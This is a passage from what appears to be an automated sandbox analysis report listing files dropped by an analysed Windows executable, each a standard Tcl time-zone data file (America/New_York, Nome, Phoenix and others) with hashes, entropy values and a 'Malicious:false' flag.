                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                              MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                              SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                              SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                              SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8680
                                                                                                                                                                                                                              Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                              SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                              SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                              SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1397
                                                                                                                                                                                                                              Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                              MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                              SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                              SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                              SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                              SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                              SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                              SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                              SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                              SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                              SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8560
                                                                                                                                                                                                                              Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                              SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                              SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                              SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7429
                                                                                                                                                                                                                              Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                              MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                              SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                              SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                              SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2069
                                                                                                                                                                                                                              Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                              MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                              SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                              SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                              SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                              MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                              SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                              SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                              SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                              MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                              SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                              SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                              SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):253
                                                                                                                                                                                                                              Entropy (8bit):4.784405839512086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/290olofDm2OHekeoHXFIV/1Vw/9vVOzFZg/VVFAKV:MB86290oloLmdHeVCXqV/k/9v4zW/OW
                                                                                                                                                                                                                              MD5:BFCE7E2618D6935031D6941AD6DDD8E3
                                                                                                                                                                                                                              SHA1:1953CD224FB2363B10372C0476760F3FB020CB00
                                                                                                                                                                                                                              SHA-256:B3EE44B3526BEDFC25B806371D3C465FDBD6CC647F30BF093750651E4A0C1BE4
                                                                                                                                                                                                                              SHA-512:31262DF034E084DA4CDB57B99178594C29129F61F3535E5D8245B8BB4AB6BF314307B0F5E58B74C349684CD761C9CDE44EB10407FB135BA6427D3D1E9DA99B40
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Paramaribo) {.. {-9223372036854775808 -13240 0 LMT}.. {-1861906760 -13252 0 PMT}.. {-1104524348 -13236 0 PMT}.. {-765317964 -12600 0 -0330}.. {465449400 -10800 0 -03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                              Entropy (8bit):4.444598497301421
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290OXmdH514YCvb8o1W4S9xRvhhHRVxORBYUNv:5tekdvYP1x52yq
                                                                                                                                                                                                                              MD5:062ECA57C0B795780240CD7AFE70BDA0
                                                                                                                                                                                                                              SHA1:89D71A11DD8D4E000F7FADBDDC77C4C1DC1195F7
                                                                                                                                                                                                                              SHA-256:DFA0EC91804B789A1A7E1B1977710435D2589A5B54C1579C8E1F5BF96D2FD007
                                                                                                                                                                                                                              SHA-512:7D123AA872E0B8286A26E338AE0F8E0D7A6F0F2EA8B1EBEC6DBB59477C812985CB246AD397D0901A58FDB7FF14171CF60169DC15C538B95C58BD2D46106A7A4D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Phoenix) {.. {-9223372036854775808 -26898 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-820519140 -25200 0 MST}.. {-796841940 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-56221200 -25200 0 MST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6613
                                                                                                                                                                                                                              Entropy (8bit):3.8549788442269395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Ux+E2p3T6ZqrNSMEBPMcywh4NF5zCC7IOTWa1HW1241UWK9BDL+3XC4BMrS2LxP:KOfS0HY2iU7KKdFL6Aa2K4gSLf8e
                                                                                                                                                                                                                              MD5:A720323DF122C70C1530788DB24700BA
                                                                                                                                                                                                                              SHA1:20674BD7D84CC686ABBB5D6B36B520A5E9C813ED
                                                                                                                                                                                                                              SHA-256:A89C580899AD2FF8DF45A783BB90D501DC32C28B92931CA18ABD13453E76244B
                                                                                                                                                                                                                              SHA-512:02B71E537B9FDAF1B68E381F0007CCBBA53EB70719ED38F51B56C5BFA64C7E3D9797053C9DE3A920E5CAFA09BBC062FCED62B5D6B9213AFA8286B95DEDAB0532
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Port-au-Prince) {.. {-9223372036854775808 -17360 0 LMT}.. {-2524504240 -17340 0 PPMT}.. {-1670483460 -18000 0 EST}.. {421218000 -14400 1 EDT}.. {436334400 -18000 0 EST}.. {452062800 -14400 1 EDT}.. {467784000 -18000 0 EST}.. {483512400 -14400 1 EDT}.. {499233600 -18000 0 EST}.. {514962000 -14400 1 EDT}.. {530683200 -18000 0 EST}.. {546411600 -14400 1 EDT}.. {562132800 -18000 0 EST}.. {576050400 -14400 1 EDT}.. {594194400 -18000 0 EST}.. {607500000 -14400 1 EDT}.. {625644000 -18000 0 EST}.. {638949600 -14400 1 EDT}.. {657093600 -18000 0 EST}.. {671004000 -14400 1 EDT}.. {688543200 -18000 0 EST}.. {702453600 -14400 1 EDT}.. {719992800 -18000 0 EST}.. {733903200 -14400 1 EDT}.. {752047200 -18000 0 EST}.. {765352800 -14400 1 EDT}.. {783496800 -18000 0 EST}.. {796802400 -14400 1 EDT}.. {814946400 -18000 0 EST}.. {828856800 -14400 1 EDT}
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.919510214047913
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290e7490ppv:MByMYbpwt290190b
                                                                                                                                                                                                                              MD5:4AB394CB233B101627136EB5E070CF9B
                                                                                                                                                                                                                              SHA1:F00600CD2DB10FE157C3696F665B9759EEA85F99
                                                                                                                                                                                                                              SHA-256:A4952380C89A6903FFE5BF8707B94B1BB72568FFD03DB04BF4D98E38AC82EEB7
                                                                                                                                                                                                                              SHA-512:58F4AD08FA10F1884FA641C4EA778C0FC013EABBD68DF5DE04D5B301227396260C3D669DB33DD6A6B33F1550C24BBD7777D756DF0D61CEEAF5EC6541EDFA296C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Port_of_Spain) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.866417687745155
                                                                                                                                                                                                                              Encrypted:false
